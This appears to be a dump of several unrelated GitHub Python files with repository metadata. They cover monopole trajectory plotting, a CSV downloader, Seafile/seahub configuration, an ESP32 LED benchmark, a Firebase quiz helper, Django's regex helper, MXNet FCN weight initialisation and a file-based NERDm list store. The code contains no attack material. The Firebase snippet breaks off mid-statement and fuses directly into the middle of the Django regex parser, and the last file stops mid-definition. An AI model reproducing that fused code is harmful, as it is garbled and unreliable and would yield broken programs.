start\\n\")\nf.write(str(distance_from_start)+\"\\n\")\nf.write(\"Kinetic Energy NONRELATIVISTIC\\n\")\nf.write(str(0.5*m*mag(vel)**2)+\"\\n\")\nf.write(\"maxvelocity\\n\")\nf.write(str(maxvelocity)+\"\\n\")\nf.write(\"maxvelocity/c\\n\")\nf.write(str(maxvelocity/c)+\"\\n\")\nf.write(\"arclength_in_rho1kpc_region\\n\")\nf.write(str(arclength_in_rho1kpc_region)+\"\\n\")\nf.write(\"time\\n\")\nf.write(str(-iterations*dt)+\"\\n\")\nf.write(\"iterations\\n\")\nf.write(str(iterations)+\"\\n\")\nf.write(\"real runtime\\n\")\nf.write(str(gettimesecs()-tstartsecs)+\"\\n\")\nf.write(\"final acc\\n\")\nf.write(np.array_str(acc)+\"\\n\\n\\n\")\nf.write(\"exit status\\n\")\nf.write(str(exitstatus))\nf.close()\ng.write(\"theta, phi, velx, vely, velz for run: \"+str(V)+\" \"+str(THETA)+\" \"+str(PHI)+\":\\n \\n\")\ng.write(str(theta_f)+\"\\n\")\ng.write(str(phi_f)+\"\\n\")\ng.write(str(vel[0])+\"\\n\")\ng.write(str(vel[1])+\"\\n\")\ng.write(str(vel[2])+\"\\n \\n\")\n\ng.close()\n\nprint(\"done with run (V,THETA,PHI): \"+str(V)+\" \"+str(THETA)+\" \"+str(PHI))\nprint(\"final speed over c:\",mag(vel)/c)\nprint(\"iterations:\",iterations)\n\nprint(\"done with all runs\")\nprint(\"finished at\",str(gettimestd()))\nprint(\"Total time running:\",gettimesecs()-tzero,\"seconds.\")\n\n\n#=========PLOTTING THE REGIONS========\nprint(\"plotting fig1: disk regions...\\n\")\nplt.figure(1)\npolar_ax=plt.subplot(111,polar=True)\npolar_ax.set_rlim((0*kpctocm,20*kpctocm))\n\n#list of regiondata, each region has an rlist and a thetalist\nplotdata=[ [[],[]] for n in range(8)]\n\nfor rr in np.linspace(5*kpctocm, 20*kpctocm, num=50):\n for ttheta in np.linspace(0, 2*np.pi, num=500):\n howmanyregions=regiondebug(rr,ttheta)[0]\n \n if howmanyregions==1:\n regionnumber=(regiondebug(rr,ttheta)[1][1])%8+1 #the region i'm in is the biggest index of the surrounding curves + 1. \n \n plotdata[regionnumber-1][0]+=[ttheta]\n plotdata[regionnumber-1][1]+=[rr]\n\ncolorlist=[\"bo\",\"go\",\"ro\",\"co\",\"mo\",\"yo\",\"ko\",\"wo\"]\n\nfor k in range(8):\n polar_ax.plot(plotdata[k][0],plotdata[k][1],colorlist[k],markersize=3)\n\nplt.title(\"Map of disk field regions\")\n\nplt.text(np.pi,32*kpctocm,\"\\nblue: r1\\ngreen: r2\\nred: r3\\ncyan: r4\\nmagenta: r5\\nyellow: r6\\nblack: r7\\ngray: r8 \")\n\n#=====PLOTTING THE TRAJECTORY=====\nprint(\"plotting fig2: trajectory...\\n\")\ntrajectory_fig=plt.figure(2)\ntrajectory_ax=trajectory_fig.gca(projection=\"3d\")\ntrajectory_ax.plot(xlist,ylist,zlist,\"r\")\n\ntrajectory_ax.set_title(\"Trajectory of Monopole\")\n\ntrajectory_ax.text2D(0.00, 0.00, \"x0=\"+str(pos_0)+\"\\nv0=\"+str(vel_0), transform=trajectory_ax.transAxes)\n\ntrajectory_ax.set_xlabel('X') #label each positional axis\ntrajectory_ax.set_ylabel('Y')\ntrajectory_ax.set_zlabel('Z')\n\ntrajectory_ax.set_xlim3d(-20*kpctocm, 20*kpctocm) #set view ranges for the x, y, and z axes \ntrajectory_ax.set_ylim3d(-20*kpctocm, 20*kpctocm)\ntrajectory_ax.set_zlim3d(-20*kpctocm, 20*kpctocm) \n\n#=====PLOTTING THE BFIELD=====\nprint(\"plotting fig3: bfield...\\n\")\nvector_fig=plt.figure(3)\nvector_ax=vector_fig.gca(projection=\"3d\")\nvector_ax.set_title(\"Bfield Vector Plot\")\nxmin,xmax=-20*kpctocm,20*kpctocm\nymin,ymax=-20*kpctocm,20*kpctocm\nzmin,zmax=-20*kpctocm,20*kpctocm\n\narrowlength=2\n\nplotstep=4*kpctocm #what is the spacing between adjacent vectors? (defines the density of vector plot)\nx,y,z = np.meshgrid(np.arange(xmin, xmax+1, plotstep),\n np.arange(ymin, ymax+1, plotstep),\n np.arange(zmin, zmax+1, plotstep))\n#for some reason, the above command creates x, y, z\n#matricies with lists of coordinates (y,x,z). I don't\n#know why it would order the coordinates like that.\n#but it's the way that it works in the quiver example \n#too, and it seems to graph correctly based on their ranges.\n\nhowmany_x, howmany_y, howmany_z = (xmax-xmin)//plotstep+1, (ymax-ymin)//plotstep+1, (zmax-zmin)//plotstep+1\n\n\nu=np.zeros(shape=(howmany_y,howmany_x,howmany_z)) #shape is (number of x values being plotted, num y values, num z values)\nv=np.zeros(shape=(howmany_y,howmany_x,howmany_z))\nw=np.zeros(shape=(howmany_y,howmany_x,howmany_z))\n\n\ndef f(VEC):\n return np.array([VEC[0],0,0])\n \n \nfor I in range(howmany_y):\n for J in range(howmany_x): \n for K in range(howmany_z):\n position=np.array([x[I][J][K], y[I][J][K], z[I][J][K]])\n# print(position)\n# print(\"\")\n# print(\"i,j,k are\", I,J,K)\n# print(\"position is:\", position)\n# print(\"r is:\", mag([position[0],position[1],0]))\n u[I][J][K]=get_B(position)[0]\n v[I][J][K]=get_B(position)[1]\n w[I][J][K]=get_B(position)[2]\n \nvector_ax.quiver(x, y, z, u, v, w, length=arrowlength)\n\n#PLOTTING CIRCLES OF R=1, 5, 20\nx_rad1_list, y_rad1_list, x_rad5_list, y_rad5_list, x_rad20_list, y_rad20_list, =[ [] for _ in range(6) ]\n\nfor angle in np.linspace(0.0,2*np.pi,num=int(2*np.pi//0.1)):\n x_rad1_list+=[1*kpctocm*np.cos(angle)]\n y_rad1_list+=[1*kpctocm*np.sin(angle)]\n x_rad5_list+=[5*kpctocm*np.cos(angle)]\n y_rad5_list+=[5*kpctocm*np.sin(angle)]\n x_rad20_list+=[20*kpctocm*np.cos(angle)]\n y_rad20_list+=[20*kpctocm*np.sin(angle)]\n\nz_circle=[]\nfor n in range(len(x_rad1_list)):\n z_circle+=[0]\n \nvector_ax.plot(x_rad1_list, y_rad1_list,z_circle,\"k\")\nvector_ax.plot(x_rad5_list, y_rad5_list,z_circle,\"k\")\nvector_ax.plot(x_rad20_list, y_rad20_list,z_circle,\"k\")\n\nvector_ax.set_xlabel('X') #label each positional axis\nvector_ax.set_ylabel('Y')\nvector_ax.set_zlabel('Z')\n\nvector_ax.set_xlim3d(xmin-arrowlength, xmax+arrowlength) #set view ranges for the x, y, and z axes \nvector_ax.set_ylim3d(ymin-arrowlength, ymax+arrowlength)\nvector_ax.set_zlim3d(zmin-arrowlength, zmax+arrowlength) \n\n#=====BUGTESTING PLOT: XY CROSS SECTION WITH MAGNITUDES =====\nprint(\"plotting fig4: xy cross section...\\n\")\nxy_fig=plt.figure(4)\nxy_ax=plt.subplot(111)\n\nzcrossvalue=1\n\nplt.title(\"XY Cross Section, Z=\"+str(zcrossvalue))\n\nxylistx, xylisty,xylistBmag = [],[],[]\n\nfor xx in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n for yy in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n xylistBmag+=[mag(get_B([xx,yy,zcrossvalue]))]\n xylistx+=[xx]\n xylisty+=[yy]\n \nxybiggestB=max(xylistBmag)\nxysmallestB=min([_ for _ in xylistBmag if _!=0])\nfor n in range(len(xylistBmag)):\n \n if xylistBmag[n] != 0:\n #here, I scale the B magnitudes so that the lowest one has size ~10^-2 and the greatest one is 1. \n #Then I flip them about 0.5, according to matplotlib's convention, so that the strongest is black.\n #I also make them a string to be interpretable in matplotlib's color thing.\n xylistBmag[n]=str(1-np.power(xylistBmag[n]/xybiggestB, 2.0/17.0))\n else:\n #zero spots are colored green to distinguish from near-white nonzero spots.\n xylistBmag[n]=\"g\"\n\n\n\nxy_ax.scatter(xylistx,xylisty,color=xylistBmag,marker='o')\n\nxy_ax.set_xbound(-20*kpctocm,20*kpctocm)\nxy_ax.set_ybound(-20*kpctocm,20*kpctocm)\n\nxy_ax.set_xlabel(\"X\")\nxy_ax.set_ylabel(\"Y\")\n\nplt.text(-26*kpctocm,-24*kpctocm,\"White ~1e-27, Blk ~1e-12, Grn=0 $\\mu G$\")\n\n\n#=====BUGTESTING PLOT: XZ CROSS SECTION WITH MAGNITUDES =====\nprint(\"plotting fig5: xz cross section...\\n\")\nxz_fig=plt.figure(5)\nxz_ax=plt.subplot(111)\n\nycrossvalue=0\n\nplt.title(\"XZ Cross Section, Y=\"+str(ycrossvalue))\n\nxzlistx, xzlistz,listBmag = [],[],[]\n\nfor xx in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n for zz in np.linspace(-21*kpctocm,21*kpctocm,num=201):\n listBmag+=[mag(get_B([xx,ycrossvalue,zz]))]\n xzlistx+=[xx]\n xzlistz+=[zz]\n \nbiggestB=max(listBmag)\nsmallestB=min([_ for _ in listBmag if _!=0])\nfor n in range(len(listBmag)):\n \n if listBmag[n] != 0:\n #here, I scale the B magnitudes so that the lowest one has exponent 10^-2 and the greatest one is 1. \n #Then I flip them about 0.5, according to matplotlib's convention, so that the strongest is black.\n #I also make them a string to be interpretable in matplotlib's color thing.\n listBmag[n]=str(1-np.power(listBmag[n]/biggestB, 2.0/17.0))\n else:\n #zero spots are colored green to distinguish from near-white nonzero spots.\n listBmag[n]=\"g\"\n\n\nxz_ax.scatter(xzlistx,xzlistz,color=listBmag,marker='o')\n\nxz_ax.set_xbound(-20*kpctocm,20*kpctocm)\nxz_ax.set_ybound(-20*kpctocm,20*kpctocm)\n\nxz_ax.set_xlabel(\"X\")\nxz_ax.set_ylabel(\"Z\")\n\nplt.text(-26*kpctocm,-24*kpctocm,\"White ~5e-27, Blk ~1e-10, Grn=0 $\\mu G$\")\n\n#=====DONE WITH PLOTS=====\nplt.show()\n\n","repo_name":"doublefelix921/monopoles","sub_path":"scripts,backups/monopoles15_graphed_cgs.py","file_name":"monopoles15_graphed_cgs.py","file_ext":"py","file_size_in_byte":24281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34909930431","text":"# author: Tiffany Timbers\n# date: 2019-12-18\n\n\"\"\"Downloads data csv data from the web to a local filepath as a csv.\n\nUsage: download_data.py --url= --out_file= \n \nOptions:\n--url= URL from where to download the data (must be in standard csv format)\n--out_file= Path (including filename) of where to locally write the file\n\"\"\"\n\nimport os\nimport pandas as pd\nimport requests\nfrom docopt import docopt\n\nopt = docopt(__doc__)\n\ndef main(url, out_file):\n try: \n request = requests.get(url)\n request.status_code == 200\n except Exception as req:\n print(req)\n print(\"Website at the provided url does not exist\")\n data = pd.read_csv(url)\n try:\n data.to_csv(out_file, index=False)\n except:\n os.makedirs(os.path.dirname(out_file))\n data.to_csv(out_file, index=False)\n\n\nif __name__ == \"__main__\":\n main(opt[\"--url\"], opt[\"--out_file\"])\n","repo_name":"ashwin2507/test","sub_path":"download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14567577619","text":"import os\nimport subprocess\nimport shutil\nimport contextlib\nfrom oslocfg import cfg\nfrom seafutil.command import SeafCommand\nfrom seafutil.seafile import SeafileCommand\n\n\nCONF = cfg.CONF\nNAME = 'seahub'\nFILENAME = 'seahub_settings.py'\n\n\nTEMPLATE = '''\\\n# -*- coding: utf-8 -*-\\n\nSECRET_KEY = '%(key)s'\\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.%(engine)s',\n 'NAME': '%(name)s',\n 'USER': '%(username)s',\n 'PASSWORD': '%(password)s',\n 'HOST': '%(host)s',\n 'PORT': '%(port)s'\n }\n}\\n\nENABLE_RESUMABLE_FILEUPLOAD = False\\n\nSEND_EMAIL_ON_ADDING_SYSTEM_MEMBER = False\\n\n'''\n\nMEMCACHED = '''\\\n\\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django_pylibmc.memcached.PyLibMCCache',\n 'LOCATION': '/run/seafile/memcached.sock',\n },\n 'locmem': {\n 'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',\n },\n}\\n\nCOMPRESS_CACHE_BACKEND = 'locmem'\\n\nTHUMBNAIL_IMAGE_SIZE_LIMIT = 100\\n\nENABLE_VIDEO_THUMBNAIL = False\\n\nFILE_PREVIEW_MAX_SIZE = 30 * 1024 * 1024\\n\n'''\n\ndef make_symlink(source, target):\n # get symlink\n pwd = os.getcwd()\n\n os.chdir(os.path.dirname(target))\n symlink = os.path.realpath(source)\n os.chdir(pwd)\n os.symlink(symlink, target)\n # return symlink\n\n\n\nclass SeahubCommand(SeafCommand):\n\n @contextlib.contextmanager\n def generate_conf(self):\n\n with self.prepare_datadir():\n conf = CONF\n cfile = os.path.join(CONF.cfgdir, FILENAME)\n text = TEMPLATE % dict(key=CONF.hubkey,\n name=conf.dbname,\n engine=conf.engine,\n username=conf.dbuser,\n password=conf.dbpass,\n host=conf.dbhost,\n port=conf.dbport)\n if CONF.memcache:\n text += MEMCACHED\n\n with open(cfile, 'w') as f:\n f.write(text)\n\n self.chown(cfile)\n try:\n yield\n except Exception as e:\n os.remove(cfile)\n raise e\n\n\n @contextlib.contextmanager\n def prepare_avatar_dir(self):\n media_dir = os.path.join(CONF.seahub, 'media')\n orig_avatar_dir = os.path.join(media_dir, 'avatars')\n orig_avatar_dir_default = os.path.join(media_dir, 'avatars.default')\n\n dest_avatar_dir = os.path.join(CONF.datadir, 'avatars')\n\n # backup avatars\n shutil.move(orig_avatar_dir, orig_avatar_dir_default)\n # copy to dst\n shutil.copytree(orig_avatar_dir_default, dest_avatar_dir)\n # change owner\n self.chown(dest_avatar_dir)\n self.chown(os.path.join(dest_avatar_dir, 'groups'))\n # make symlink\n make_symlink(dest_avatar_dir, orig_avatar_dir)\n\n\n try:\n yield\n except Exception as e:\n # rollback\n os.unlink(orig_avatar_dir)\n shutil.rmtree(dest_avatar_dir)\n shutil.move(orig_avatar_dir_default, orig_avatar_dir)\n raise e\n\n def execute(self):\n with self.prepare_avatar_dir():\n with self.database.prepare():\n sqlfile = os.path.join(CONF.seahub, 'sql', 'mysql.sql')\n info = dict(user=CONF.dbuser, passwd=CONF.dbpass,\n host=CONF.dbhost, port=CONF.dbport,\n schema=CONF.dbname, sqlfile=sqlfile)\n command = 'mysql -u%(user)s -p%(passwd)s -h%(host)s -P %(port)d %(schema)s < %(sqlfile)s' % info\n sub = subprocess.Popen(command, shell=True)\n code = sub.wait()\n if code != 0:\n raise ValueError('Run init sql fail')\n thumbdir = os.path.join(CONF.seahub, 'seahub', 'thumbnail', 'thumb')\n if not os.path.exists(thumbdir):\n os.makedirs(thumbdir)\n self.chown(thumbdir)\n","repo_name":"lolizeppelin/seafutil","sub_path":"seafutil/seahub.py","file_name":"seahub.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71601697069","text":"import machine\nimport time\n\n# (blue) on-board LED:\nled = machine.Pin(2, machine.Pin.OUT)\n\nN = 100000\n\n# LED direct aan en uit via directe method aanroep.\ndef blink_simple(n):\n for i in range(n):\n led.on()\n led.off()\n\ndef timer(f, n):\n t0 = time.ticks_us()\n f(n)\n t1 = time.ticks_us()\n dt = time.ticks_diff(t1, t0)\n fmt = \"{:5.3f} s, {:6.3f} uSec/blink : {:8.2f} kHz/s\"\n print(fmt.format(dt * 1e-6, dt/N, N/dt * 1e3))\n\n\ntimer(blink_simple, N)\n","repo_name":"bvhest/IoT-01_Playground","sub_path":"esp32_wroom/fastLED/fastLED_4.py","file_name":"fastLED_4.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"343495057","text":"\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nimport random\nimport json\n\nJSON_PATH='./pet-quiz-cf348-firebase-adminsdk-4oflx-cde31cd4ab.json'\ndef init_database():\n cred = credentials.Certificate(JSON_PATH)\n firebase_admin.initialize_app(cred)\n db = firestore.client()\n\n return db\n\n\nADD_DATA_PATH = './add.json'\ndef add_data(db,add):\n \n try:\n doc_ref = db.collection('questions')\n doc_ref.add(add)\n print(1)\n return\n except:\n print(2)\n return\n\ndef add_some_data(db,add_list_data): \n doc_ref = db.collection('questions')\n for add_j in add_list_data:\n try:\n doc_ref.add(add_j)\n print(\"added\")\n except:\n print(\"denyed\")\n return\n\n \n\ndef main():\n db = init_database()\n\n#問題数を指定して問題を返す\ndef get_questions_by_num(db,number):\n docs = get_all_questions(db)\n if not (docs==None):\n #ナンバーの有効性を判定\n if(number<=len(docs)):\n published = []\n questions = []\n i=0\n while(i\"\n # We are in a named backreference.\n else:\n terminal_char = \")\"\n name = []\n ch, escaped = next(pattern_iter)\n while ch != terminal_char:\n name.append(ch)\n ch, escaped = next(pattern_iter)\n param = \"\".join(name)\n # Named backreferences have already consumed the\n # parenthesis.\n if terminal_char != \")\":\n result.append(Group(((\"%%(%s)s\" % param), param)))\n walk_to_end(ch, pattern_iter)\n else:\n result.append(Group(((\"%%(%s)s\" % param), None)))\n elif ch in \"*?+{\":\n # Quantifiers affect the previous item in the result list.\n count, ch = get_quantifier(ch, pattern_iter)\n if ch:\n # We had to look ahead, but it wasn't need to compute the\n # quantifier, so use this character next time around the\n # main loop.\n consume_next = False\n\n if count == 0:\n if contains(result[-1], Group):\n # If we are quantifying a capturing group (or\n # something containing such a group) and the minimum is\n # zero, we must also handle the case of one occurrence\n # being present. All the quantifiers (except {0,0},\n # which we conveniently ignore) that have a 0 minimum\n # also allow a single occurrence.\n result[-1] = Choice([None, result[-1]])\n else:\n result.pop()\n elif count > 1:\n result.extend([result[-1]] * (count - 1))\n else:\n # Anything else is a literal.\n result.append(ch)\n\n if consume_next:\n ch, escaped = next(pattern_iter)\n consume_next = True\n except StopIteration:\n pass\n except NotImplementedError:\n # A case of using the disjunctive form. No results for you!\n return [(\"\", [])]\n\n return list(zip(*flatten_result(result)))\n\n\ndef next_char(input_iter):\n r\"\"\"\n An iterator that yields the next character from \"pattern_iter\", respecting\n escape sequences. An escaped character is replaced by a representative of\n its class (e.g. \\w -> \"x\"). If the escaped character is one that is\n skipped, it is not returned (the next character is returned instead).\n\n Yield the next character, along with a boolean indicating whether it is a\n raw (unescaped) character or not.\n \"\"\"\n for ch in input_iter:\n if ch != \"\\\\\":\n yield ch, False\n continue\n ch = next(input_iter)\n representative = ESCAPE_MAPPINGS.get(ch, ch)\n if representative is None:\n continue\n yield representative, True\n\n\ndef walk_to_end(ch, input_iter):\n \"\"\"\n The iterator is currently inside a capturing group. Walk to the close of\n this group, skipping over any nested groups and handling escaped\n parentheses correctly.\n \"\"\"\n if ch == \"(\":\n nesting = 1\n else:\n nesting = 0\n for ch, escaped in input_iter:\n if escaped:\n continue\n elif ch == \"(\":\n nesting += 1\n elif ch == \")\":\n if not nesting:\n return\n nesting -= 1\n\n\ndef get_quantifier(ch, input_iter):\n \"\"\"\n Parse a quantifier from the input, where \"ch\" is the first character in the\n quantifier.\n\n Return the minimum number of occurrences permitted by the quantifier and\n either None or the next character from the input_iter if the next character\n is not part of the quantifier.\n \"\"\"\n if ch in \"*?+\":\n try:\n ch2, escaped = next(input_iter)\n except StopIteration:\n ch2 = None\n if ch2 == \"?\":\n ch2 = None\n if ch == \"+\":\n return 1, ch2\n return 0, ch2\n\n quant = []\n while ch != \"}\":\n ch, escaped = next(input_iter)\n quant.append(ch)\n quant = quant[:-1]\n values = \"\".join(quant).split(\",\")\n\n # Consume the trailing '?', if necessary.\n try:\n ch, escaped = next(input_iter)\n except StopIteration:\n ch = None\n if ch == \"?\":\n ch = None\n return int(values[0]), ch\n\n\ndef contains(source, inst):\n \"\"\"\n Return True if the \"source\" contains an instance of \"inst\". False,\n otherwise.\n \"\"\"\n if isinstance(source, inst):\n return True\n if isinstance(source, NonCapture):\n for elt in source:\n if contains(elt, inst):\n return True\n return False\n\n\ndef flatten_result(source):\n \"\"\"\n Turn the given source sequence into a list of reg-exp possibilities and\n their arguments. Return a list of strings and a list of argument lists.\n Each of the two lists will be of the same length.\n \"\"\"\n if source is None:\n return [\"\"], [[]]\n if isinstance(source, Group):\n if source[1] is None:\n params = []\n else:\n params = [source[1]]\n return [source[0]], [params]\n result = [\"\"]\n result_args = [[]]\n pos = last = 0\n for pos, elt in enumerate(source):\n if isinstance(elt, str):\n continue\n piece = \"\".join(source[last:pos])\n if isinstance(elt, Group):\n piece += elt[0]\n param = elt[1]\n else:\n param = None\n last = pos + 1\n for i in range(len(result)):\n result[i] += piece\n if param:\n result_args[i].append(param)\n if isinstance(elt, (Choice, NonCapture)):\n if isinstance(elt, NonCapture):\n elt = [elt]\n inner_result, inner_args = [], []\n for item in elt:\n res, args = flatten_result(item)\n inner_result.extend(res)\n inner_args.extend(args)\n new_result = []\n new_args = []\n for item, args in zip(result, result_args):\n for i_item, i_args in zip(inner_result, inner_args):\n new_result.append(item + i_item)\n new_args.append(args[:] + i_args)\n result = new_result\n result_args = new_args\n if pos >= last:\n piece = \"\".join(source[last:])\n for i in range(len(result)):\n result[i] += piece\n return result, result_args\n\n\ndef _lazy_re_compile(regex, flags=0):\n \"\"\"Lazily compile a regex with flags.\"\"\"\n\n def _compile():\n # Compile the regex if it was not passed pre-compiled.\n if isinstance(regex, (str, bytes)):\n return re.compile(regex, flags)\n else:\n assert not flags, \"flags must be empty if regex is passed pre-compiled\"\n return regex\n\n return SimpleLazyObject(_compile)\n","repo_name":"django/django","sub_path":"django/utils/regex_helper.py","file_name":"regex_helper.py","file_ext":"py","file_size_in_byte":12771,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"720237715","text":"import mxnet as mx\nimport numpy as np\nimport sys\nimport logging\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n# make a bilinear interpolation kernel, return a numpy.ndarray\ndef upsample_filt(size):\n factor = (size + 1) // 2\n if size % 2 == 1:\n center = factor - 1.0\n else:\n center = factor - 0.5\n og = np.ogrid[:size, :size]\n return (1 - abs(og[0] - center) / factor) * \\\n (1 - abs(og[1] - center) / factor)\n\ndef init_from_vgg16(ctx, fcnxs_symbol, vgg16fc_args, vgg16fc_auxs):\n fcnxs_args = vgg16fc_args.copy()\n fcnxs_auxs = vgg16fc_auxs.copy()\n for k,v in fcnxs_args.items():\n if(v.context != ctx):\n fcnxs_args[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_args[k])\n for k,v in fcnxs_auxs.items():\n if(v.context != ctx):\n fcnxs_auxs[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_auxs[k])\n data_shape=(1,3,500,500)\n arg_names = fcnxs_symbol.list_arguments()\n arg_shapes, _, _ = fcnxs_symbol.infer_shape(data=data_shape)\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_weight', 'score_bias', 'score_pool4_weight', 'score_pool4_bias', \\\n 'score_pool3_weight', 'score_pool3_bias']])\n fcnxs_args.update(rest_params)\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes)\n if x[0] in [\"bigscore_weight\", 'score2_weight', 'score4_weight']])\n for k, v in deconv_params.items():\n filt = upsample_filt(v[3])\n initw = np.zeros(v)\n initw[range(v[0]), range(v[1]), :, :] = filt # becareful here is the slice assing\n fcnxs_args[k] = mx.nd.array(initw, ctx)\n return fcnxs_args, fcnxs_auxs\n\ndef init_from_fcnxs(ctx, fcnxs_symbol, fcnxs_args_from, fcnxs_auxs_from):\n \"\"\" use zero initialization for better convergence, because it tends to oputut 0,\n and the label 0 stands for background, which may occupy most size of one image.\n \"\"\"\n fcnxs_args = fcnxs_args_from.copy()\n fcnxs_auxs = fcnxs_auxs_from.copy()\n for k,v in fcnxs_args.items():\n if(v.context != ctx):\n fcnxs_args[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_args[k])\n for k,v in fcnxs_auxs.items():\n if(v.context != ctx):\n fcnxs_auxs[k] = mx.nd.zeros(v.shape, ctx)\n v.copyto(fcnxs_auxs[k])\n data_shape=(1,3,500,500)\n arg_names = fcnxs_symbol.list_arguments()\n arg_shapes, _, _ = fcnxs_symbol.infer_shape(data=data_shape)\n rest_params = {}\n deconv_params = {}\n # this is fcn8s init from fcn16s\n if 'score_pool3_weight' in arg_names:\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_pool3_bias', 'score_pool3_weight']])\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes) if x[0] \\\n in [\"bigscore_weight\", 'score4_weight']])\n # this is fcn16s init from fcn32s\n elif 'score_pool4_weight' in arg_names:\n rest_params = dict([(x[0], mx.nd.zeros(x[1], ctx)) for x in zip(arg_names, arg_shapes)\n if x[0] in ['score_pool4_weight', 'score_pool4_bias']])\n deconv_params = dict([(x[0], x[1]) for x in zip(arg_names, arg_shapes) if x[0] \\\n in [\"bigscore_weight\", 'score2_weight']])\n # this is fcn32s init\n else:\n logging.error(\"you are init the fcn32s model, so you should use init_from_vgg16()\")\n sys.exit()\n fcnxs_args.update(rest_params)\n for k, v in deconv_params.items():\n filt = upsample_filt(v[3])\n initw = np.zeros(v)\n initw[range(v[0]), range(v[1]), :, :] = filt # becareful here is the slice assing\n fcnxs_args[k] = mx.nd.array(initw, ctx)\n return fcnxs_args, fcnxs_auxs\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/fcn-xs/init_fcnxs.py","file_name":"init_fcnxs.py","file_ext":"py","file_size_in_byte":3833,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"72988757227","text":"\"\"\"\nan implementation of the NERDResource storage interface that stores the data in JSON files on disk\n\nThis is provided for development purposes that requires only simple logical storage operations. See \n:py:mod:`nerdstore.base= self._nxtseq:\n self._idseq = n + 1\n self._cache_next_seq()\n\n @property\n def ids(self) -> [str]:\n return list(self._order)\n\n @property\n def count(self) -> int:\n return len(self._order)\n\n def _get_item_by_id(self, id: str) -> Mapping:\n objf = self._obj_file(id)\n if not objf.exists():\n raise ObjectNotFound(id)\n\n try:\n return read_json(str(objf))\n except (ValueError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to read file as JSON: %s\" \n % (str(self._seqp), str(ex)))\n\n def _get_item_by_pos(self, pos: int) -> Mapping:\n try: \n return self._get_item_by_id(self._order[pos])\n except IndexError:\n raise ObjectNotFound(\"position=\"+str(pos))\n\n def set_order(self, ids: Iterable[str]): \n neworder = []\n for id in ids:\n if id not in neworder and id in self._order:\n neworder.append(id)\n for id in self._order:\n if id not in neworder:\n neworder.append(id)\n self._order = neworder\n self._cache_ids()\n\n def move(self, idorpos: IDorPos, pos: int = None, rel: int = 0) -> int:\n if pos is None:\n pos = self.count\n rel = 0\n if not isinstance(pos, int):\n raise TypeError(\"move(): pos is not an int\")\n\n if isinstance(idorpos, int):\n if idorpos < -1*(len(self._order)-1) or idorpos >= len(self._order):\n raise IndexError(idorpos)\n oldpos = idorpos\n else:\n # ensure existence of data\n jf = self._obj_file(idorpos)\n if not jf.exists():\n raise ObjectNotFound(idorpos)\n try: \n oldpos = self._order.index(idorpos)\n except ValueError:\n # shouldn't happen; self-correcting programmer error (danger!)\n self._order.append(idorpos)\n oldpos = len(self._order) - 1\n\n if not isinstance(rel, (int, float)):\n rel = 1 if bool(rel) else 0\n if rel != 0:\n rel = math.floor(round(math.fabs(rel)/rel)) # +1 or -1\n pos = oldpos + rel * pos\n if pos == oldpos:\n return pos\n\n id = self._order.pop(oldpos)\n if pos > len(self._order):\n self._order.append(id)\n return len(self._order) -1\n\n elif pos < 0:\n pos = 0\n \n self._order.insert(pos, id)\n self._cache_ids()\n return pos\n\n def _set_item(self, id: str, md: Mapping, pos: int=None):\n if pos is not None and abs(pos) > self.count:\n raise IndexError(\"NERDm List index out of range: \"+str(pos))\n md = OrderedDict(md)\n md['@id'] = id\n \n neworder = list(self._order)\n if pos is not None:\n try:\n oldpos = neworder.index(id)\n except ValueError as ex:\n pass\n else:\n if pos > 0 and oldpos < pos:\n pos -= 1\n elif pos == -1 * len(neworder):\n pos = 0\n neworder.remove(id)\n neworder.insert(pos, id)\n elif id not in neworder:\n neworder.append(id)\n\n try:\n write_json(md, self._obj_file(id))\n except (TypeError, IOError) as ex:\n raise StorageFormatException(\"%s: Failed to write object file: %s\"\n % (str(self._seqp), str(ex)))\n self._order = neworder\n self._cache_ids()\n\n def _remove_item(self, id: str):\n out = self._get_item_by_id(id) # may raise ObjectNotFound\n\n if id in self._order:\n self._order.remove(id)\n self._cache_ids()\n\n return out\n\nclass FSBasedAuthorList(FSBasedObjectList, NERDAuthorList):\n \"\"\"\n an file-based implementation of the NERDAuthorList interface\n \"\"\"\n _pfx = \"auth\"\n def __init__(self, resource: NERDResource, authdir: str):\n FSBasedObjectList.__init__(self, resource, authdir)\n\n def load_authors(self, authors: Iterable[Mapping]) -> int:\n for auth in authors:\n # any validity checking?\n self.append(auth)\n\nclass FSBasedRefList(FSBasedObjectList, NERDRefList):\n \"\"\"\n an file-based implementation of the NERDRefList interface\n \"\"\"\n _pfx = \"ref\"\n def __init__(self, resource: NERDResource, refdir: str):\n FSBasedObjectList.__init__(self, resource, refdir)\n\n def load_references(self, refs: Iterable[Mapping]) -> int:\n for ref in refs:\n # any validity checking?\n self.append(ref)\n\nclass 